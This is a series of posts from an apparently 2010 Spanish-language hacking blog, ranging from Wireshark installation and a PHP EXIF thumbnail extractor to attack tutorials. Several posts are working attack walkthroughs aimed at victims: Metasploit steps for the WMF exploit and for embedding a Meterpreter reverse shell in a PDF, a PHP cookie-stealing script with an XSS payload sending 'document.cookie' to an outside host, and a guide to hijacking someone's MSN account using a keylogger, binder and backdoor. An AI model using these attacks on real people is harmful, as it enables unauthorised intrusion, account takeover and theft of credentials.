23 de octubre de 2010

¿Me dices que puertos tengo abiertos?


La eterna pregunta que en algún momento dado todos hemos hecho; bien sea porque andamos configurando una red ajena y queremos averiguar que puertos estamos exponiendo al exterior, pero no tenemos acceso a una maquina bajo nuestro control, o incluso trabajando, por no tener acceso al exterior salvo mediante un proxy.

En esos momentos, siempre viene bien encontrar conectado a alguien que nos pueda hacer "el trabajito" pero no siempre hay un alma caritativa online para ese menester. En esos casos viene muy muy bien la pagina web que quería presentar hoy: linux-sec.

Esta pagina web permite usar un nmap de forma remota y totalmente gratis. Una vez parametrizado el tipo de scaneo que necesitamos, lo lanzamos y nos devuelve el resultado del scaneo de puertos como si hubiéramos usado nuestro propio Nmap.

Seguro que puede sacar a mas de uno de un apuro ! Eso si, usadlo con moderación, es un servicio muy muy interesante y seria una pena que cesara por un uso indebido
Bueno esto es todo Saludos!! xD

16 de octubre de 2010

Wireshark, instalación y conceptos básicos por Mask

logo wireshark 
Wireshark es un capturador/analizador de paquetes de red (llamado a veces, sniffer o esnifer). Wireshark te permitirá ver, aun nivel bajo y detallado, qué está pasando en tu red. Además es gratuito, open source, y multiplataforma. Sin duda la mejor opción al momento de auditar nuestra red.
Posee una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras)

¿Para que/quien es util Wireshark?

  • Administradores lo usan para resolver problemas en la red
  • Ingenieros lo usan para examinar problemas de seguridad
  • Desarrolladores lo usan para depurar la implementación de los protocolos de red
  • Estudiantes los usan para aprender internamente cómo funciona una red

Características de Wireshark

  • Disponible para Linux y Windows
  • Captura de paquetes en vivo desde una intefaz de red
  • Muestra los paquetes con información detallada de los mismos
  • Abre y guarda paquetes capturados
  • Importar y exportar paquetes en diferentes formatos
  • Filtrado de información de paquetes
  • Resaltado de paquetes dependiendo el filtro
  • Crear estadísticas

Instalación de Wireshark (Terminal)

La verdad es que lo tienes muy fácil si usas Debian o sus derivados (Ubuntu, por ejemplo). Tan solo debes hacer lo de siempre:
sudo apt-get install wireshark
Y ya está! Además la mayoría de las distribuciones lo incluyen en sus repositorios, por lo que lo tienes fácil en openSuse, Fedora, o Gentoo. Por ejemplo, en Gentoo:
USE=”adns gtk ipv6 portaudio snmp ssl kerberos threads selinux” emerge wireshark
O FreeBSD:
pkg_add -r wireshark
Sin embargo, si lo que deseas/necesitas es instalarlo desde las fuentes, vamos por ello:

Instalación del Wireshark desde el tarball

Antes que nada, para poder compilar correctamente Wireshark debes tener dos cosas:
  • Gtk+ y Glib, que puedes descargar de www.gtk.org
  • libpcap, las librerías para captura de paquetes que Wireshark usa. La puedes encontrar en www.tcpdump.org
Ahora, debes descargar el código fuente de la página oficial descomprimirlo e instalarlo:
tar zxvf wireshark-1.0.3.tar.gz
cd wireshark-1.0.3/
./configure
make
sudo make install
Problemas experimentados: personalmente tuve que instalar manualmente bison, flex y gtk+; en muchos sistemas no es necesario, pero mejor que estés preparado.

Entendiendo la interfaz gráfica de Wireshark

Luego de la instalación podrás iniciar el programa con el comando wireshark:


La interfaz gráfica de Wireshark está principalmente dividida en las siguientes secciones (de arriba a abajo):
  • La barra de herramientas, donde tienes todas las opciones a realizar sobre la pre y pos captura.
  • La barra de herramientas principal, donde tienes las opciones más usadas en Wireshark.
  • La barra de filtros, donde podrás aplicar filtros a la captura actual de manera rápida
  • El listado de paquetes, que muestra un resumen de cada paquete que es capturado por Wireshark
  • El panel de detalles de paquetes que, una vez seleccionado un paquete en el listado de paquetes, muestra información detallada del mismo
  • El panel de bytes de paquetes, que muestra los bytes del paquete seleccionado, y resalta los bytes correspondientes al campo seleccionado en el panel de detalles de paquetes.
  • La barra de estado, que muestra algo de información acerca del estado actual de Wireshark y la captura.

9 de octubre de 2010

Como instalar Metasploits framework en Windows por Mask

Aclaro que esto fue hecho de una manera rápida, por lo consiguiente quiero pedir una disculpa adelantada por las burradas que en su elaboración pueda haber llegado a cometer, este minitutorial, explica como se lleva a cabo la explotación del bug (tan comentado) en los archivos WMF ocupando el Metasploit, quiero aclarar que lo que todo lo explicado a continuación se ha escrito con motivos de conocimientos y aprendisaje. haha..!!

ya que MetaSploit es bastante novedoso, no muchos saben usarlo, así que aquí va un minitutorialpara el uso y la aplicación de el exploit:

Param comenzar, tendremos que bajarlo e instalarlo (no creo que haya problema con esto...)
http://www.metasploit.com/tools/framework-2.5.exe


esta versión (2.5) es para windows y está escrita en PERL, si buscas la versión para linux puedes buscar la versión 3.0, escrita en RUBY y con algunas mejoras.

bueno, una vez terminada la instalación del metasploit aparecerá la consola principal del programa, por ahora no la necesitaremos, así que la puedes cerrar.

llegados a este punto tenemos que hacer la actualización del metasploit, dirígete hacia el menú del metasploit (Inicio / Todos los Programas / Metasploit Framework) y busca MSFupdate, córrelo y confirma que se desea iniciar la actualización (yes)..
bien, ahora tendremos que repetir el proceso de actualización (ya que esta vez pediremos la actualiuzación de la base de datos de exploits), de esta manera se nos descargará una lista con los exploits nuevos y que tu versión de MetaSploit no tiene...
bueno, entre esta actualización debe de venir el exploit "ie_xp_pfv_metafile", que es el que en este momento ocuparemos como referencia.

una vez terminada la actualización llegó la hora de entrar a la configuración del exploit.. ahora tendremos que elegir que es lo que deseamos utilizar..

Citar
--modo web
o
Citar
--modo consola

en lo personal no me gusta el modo web por lo que les he explicado arriba, así que pasaré a explicar el modo consola (llámenme nostálgico  :cry: Pinguinitoooooooooooo.... no, no, Toritoooooo xDDDD)... aunque una vez entendido el modo consola, no creo que les cueste más entender el modo web basta con entrar en para iniciar el servidor y entrar desde cualquier navegador a http://127.0.0.1:55555...

ok ya que solo es una pequeña demostración de lo que se puede hacer con el MetaSploit paso a explicar los comandos básicos para probar el exploit que se comenta en el post...

Bien; una vez en la consola de comandos se pasa a configurar el programa de la siguiente manera...

msf >

Código:
show exploits  

*para que nos muestre los exploits actuales en la base de datos del programa, entre estos debemos hayar nuestro exploit "ie_xp_pfv_metafile".

msf >
Código:
use ie_xp_pfv_metafile
*esto es para cargar cargar el exploit

msf use ie_xp_pfv_metafile >
Código:
Set LHOST Tu-IP

*ya que utilizaremos una reverse_conect, tendremos que especificar hacia donde se dirigirá la conexión (hasta nosotros)

msf use ie_xp_pfv_metafile >
Código:
Set PAYLOAD Win32_reverse

*así indicaremos que nuestra conexión será de tipo Reverse_Conect (para ver una lista completa de las conexiones que puedes usar teclea Show payloads, todo depende directamente si el expoit permite esto o no).

msf use ie_xp_pfv_metafile
Código:
set RHOST Ip-Víctima 
*solo nos resta colocar a la víctima...

msf use ie_xp_pfv_metafile
Código:
Exploit
*así indicamos que el exploit está listo y que se debe de ejecutar...

El programa nos indica que se ha puesto a la escuecha el puerto 8080 en nuestro servidor xxx.xxx.xxx.xxx con algo como

ahora solo resta esperar a que la víctima se conecte a nuestro servidor, cuando esto suceda, la Víctima no recibirá respuesta por parte de el server del atacante, sin embargo, el Visor de imágenes y fax de Windows se la abrirá y cargará como si estuviera esperando por cargar algo, si cierra esta ventana, el Metaspoit nos avisará con algo como <>, pero la shell quedará activa...

bien creo que es todo, cabe mensionar que esto ya no es tan bueno como cuando se descubrió, ya que ahora la mayoría de los antivirus lo detectan y como dijo philos y GTO, ya hay un parche no oficial y para el miércoles sale el oficial...

Tips:

  • En caso de tener una Ip Dinámica siempre está el "NO - IP" que hace maravillas  
  • si lo que haremos es usar la ingeniería social siempre podemos adquirir un free Domain en servidores como <.Tk>, <.cjb.net> etc..

espero les haya gustado y sobre todo SERVIDO.. y como siempre cabe mencionar que el uso de esta información es puramente educativo y pedir una disculpa por las babosadas que he cometido durante la elaboración del texto haha..!!

 Salidos xD

5 de octubre de 2010

Juego para Programadores | LightBot


Este es el primer juego que pongo en este Blog. Se trata de un juego de lógica llamado LightBot donde nos hará falta nuestro instinto de programadores para resolver los puzzles .El juego consiste basicamente en programar un pequeño robot con las intrucciones necsarias para quer pueda recorer too el circuito.
Las instrucciones son muy pocas pero nos sobran para lo que quieremos hacer, avanzar, saltar, girar, encender la luz. Permite crear funciones para agilizar las pruebas y hacer recursividad de ellas.
LightBot

4 de octubre de 2010

Embebiendo un Ejecutable dentro de un PDF con MetaSploit por Mask

En este artículo, vamos a ver como embeber un archivo ejecutable “.exe”, dentro de un archivo PDF, utilizando el módulo “adobe_pdf_embedded_exe” de MetaSploit.
Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.

MetaSploit: adobe_pdf_embedded_exe
Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo “adobe_pdf_embedded_exe” de MetaSploit, en donde vamos a embeber un archivo ejecutable “.exe”, o un payload de MetaSploit, dentro de un archivo PDF.

Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

Lo interesante del módulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF’s existentes de una víctima en particular en Google:

 
Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables haha..!!


Embebiendo un Payload de MetaSploit en un PDF
Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción “INFILENAME” vamos a poner el path al archivo PDF que queremos utilizar, y en la opción “FILENAME”, el nombre del nuevo archivo PDF con el payload embebido:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit
Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E

Cuando la víctima abra el archivo PDF, verá un warning:



Al momento de presion “Open”, el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de “Desktop”, “My Documents” y “Documents”.

Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios “Escritorio” y “Mis Documentos”, y volver a generar el PDF:
# editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:
 

Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: “start programa.pdf”.
El archivo que enviamos a la víctima se llamaba “evil.pdf”, cuando dropeo el payload lo hizo con el nombre “programa.pdf”, como el nombre del PDF verdadero que configuramos oportunamente. En realidad, “programa.pdf” es un archivo “.exe”, con el payload de Meterpreter, pero como el comando “start” puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.

Embebiendo un Ejecutable en un PDF
Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción “EXENAME”. En este caso estamos embebiendo la famosa calculadora de Windows “calc.exe”:
set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit 

Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable “calc.exe”, por alguna razón si no lo configuramos no nos deja seguir.
set PAYLOAD windows/shell/bind_tcp
Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:
 
 
Una vez que la víctima presione “Open”, se correrá el archivo ejecutable que embebimos, el famoso “calc.exe”:
 
Eso es todo amigos espero y hayan entendido, de lo contrario Posteenlo aqui mismo xD 

3 de octubre de 2010

Ruby - Si queremos Programar el Metaspl0it por Mask

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.

Ruby CookBook - Click Aquí

Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.

Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.

Bueno esto  es todo espero y les sirva xD haha..!!

Extraer metadatos de imagenes con php por Mask

¿Que aprenderemos hoy?
a saber si una foto a sido retocada, y poder ver la imagen original. Bien los meta-datos son  Información que se guarda automáticamente al generar un archivo: .doc, .jpg,etc. y que no son visibles al ojo humano. Esta información la genera el software que se utilizo para crear el archivo en el caso de las fotos, por ejemplo la genera el software de la cámara fotográfica ( solo si es digital ¬¬). haha..!!
en el caso de las fotografiás un tipo de meta-datos son los EXIF.

bien los meta-datos EXIF contienen información importante como : fecha original, modelo de la cámara,etc. pero lo mas importante y en lo que se fijara este post es extraer el "THUMBNAIL" original.

Para los que no sabían cada vez que se modifica una imagen se guarda una copia en miniatura de la original que no se podría observar a simple vista, pero con algo de código podremos extraerlo.

Ejemplo:



aquí vemos una foto trucada y a su lado el thumbnail extraido ( la foto original)

¿Como la extraemos con PHP ?
con exif_thumbnail:
eh aquí un pequeño código el cual puedes modificar:


<?php
set_time_limit ( 0 );
function getmicrotime () {
$temparray = split ( " " , microtime ());
$returntime = $temparray [ 0 ]+ $temparray [ 1 ];
return $returntime ;
}


$maindir = "." ;
$mydir = opendir ( $maindir ) ;
$starttime = getmicrotime ();
$i = 0 ;
while( $fn = readdir ( $mydir ))
{
$startimagetime = getmicrotime ();
$ext = strtolower ( substr ( $fn , strlen ( $fn )- 3 ));
if ( $ext == "jpg" ) {
$i ++;
echo $fn . " se proceso satisfactorio<br>" ;
flush ();
$image = exif_thumbnail ( $fn , $width , $height , $type );
if ( $image !== false ) {
$handle = fopen ( $fn . ".thumb.jpg" , 'a' );
echo "<img src='".$fn."' width='400' height='301' />";
echo "<img src='".$fn .".thumb.jpg' width='400' height='301' />";
fwrite ( $handle , $image );
} else {
echo "imagen de miniatura no disponible para: " . $fn . "<br>" ;
echo "<img src='".$fn.".thumb.jpg' width='400' height='301' />";
}
}
}
closedir ( $mydir );
$endtime = getmicrotime ();
echo "<br>Tiempo tardado " ;
print $endtime - $starttime ;
echo "<br> Imagenes procesadas: " . $i ;
?>
simplemente montalo en localhost, mete las fotos en la carpeta raíz y  voilá  , podrás ver las fotos originales .
haha..!!

1 de octubre de 2010

Robando Cookies con un Xss por Mask

http://rogunix.siften.com/wp-content/uploads/2010/08/xss.jpg
 Que tal amigos de CorporatiOn StudiOs bueno pz hoy vengo con un nuevo tutorial hehe..!! hoy les enseñare como robar cokies con xss haha..!!  Esto es muy viejo sin embargo me gusta ponerlo para queno se pierda el sentido de que hay contenido arcaico pero útil en la Comunidad haha..!!
Primero debemos de conseguir una web vulnerable a Xss de preferencia usen una que no moleste tanto algo asi como una que sea 100% vulnerable que pueda mostrar cookies y mas, tambien vamos a necesitar un Servidor Web que permita PHP ;)

Ahora si miren les diré el funcionamiento nosotros vamos a crear un archivo donde se guarden las cookies, lo llamaremos almacen.txt ;) mm ahora necesitamos hacer que los datos se guarden ahi y como hacemos eso? pues hay que crear un script en PHP que haga la función.

Ahora nuestro code será
<?php
$ip = $_Server['REMOTE_ADDR'];
$co = $_GET[c];
$datos = "ip: " . $ip . "cookie: " . $co . "<br>" . "CorporatiOn StudiOs";
$archivo = fopen('almacen.txt', 'a');
fwrite($archivo,$datos);
fclose($archivo);
header("Location: http://webtuya.com");
?>


lo pondremos en el mismo directorio que el almacen.txt y lo guardaremos como rob.php

Bueno con ese code se roban las cookies y se obtiene la ip de la víctima... ustedes pueden personalizar el documento para que cojan mas cosas de la víctima, ahora ustedes lo que tienen que hacer es generar un xss con window.location...

window.location='http://miweb.com/rob.php?c='+document.cookie;

Ahora si ya estamos completos o casi solo falta completar... con un ejemplo

http://www.webvulnerableatodo.com/buscador.php?palabra=

en algunos casos podemos variar y poner document.location en ves de window.location. Espero les haya gustado el tuto, dudas o cualquier cosa pues comenten. haha..!! xD

El famoso "Como Hackear msn por Mask

Les queiro hablar esta ves sobre un fenómeno que me ha tenido un poco inquieto por los ultimos muchos años... desde que empese en la seguridad informática aquellos que no conocian de este tema siempre me decian enseñame a hackear msn y ese tipo de cosas, este articulo va para aquellos que quería aprender y nunca pudieron, pero se los voy a enseñar de una manera que solo puedan entender con previo conocimiento haha..!!


 
1.- Deben de Conseguir la IP de la persona.

2.- Consigan un Bruter de Conexion por puerto, de preferencia haganlo ustedes para que depues no le hechen la culpa al programa ;).

3.- Una ves que hayan conseguido acceso pues es facil usen un programa que sirva como keylogger o escriban el codigo ustedes mismo para que no le hechen la culpa al programa.

4.- Instalenle el keylogger a la víctima por algun lugar que ustedes quieran de preferencia con un Binder cojan un archivo del system32 para que no se arriesgue a borrar nada ;)

5.- Espera un tiempo a que tu víctima consiga escribr su pass.

6.- Vean la Pass en el archivo donde se tienen que guardar segun su programa.

7.- Dejenle un backdoor para cualquier tipo de inconveniente que tengan ustedes con la pass.

8.- Descarguense el Pidgin y/o Amsn y pueden intentar conectarse y podran conectarse normalmente.

9.- Vayan a la página de hotmail y cambien la pass de su víctima, hagan su fechoría

10.- Luego cada ves que quieran monitorearla pues usen el Backdoor que dejaron.
 
Nota: Muchas empresas usan una especie de sistema parecido claro que obviando siertas cosas para conocer cuando un empleado los quiere traicionar o hace algo ilegal por su mail privado.

Como Cuidarse:
Siempre dejen Su Firewall Prendido, Usen programas u otros firewalls que protejan su equipo de conexiones remotas, usen contraseñas largas para el login de su windows y su router.
 
Bueno me despido y un gran saludo ami amigo Tro1l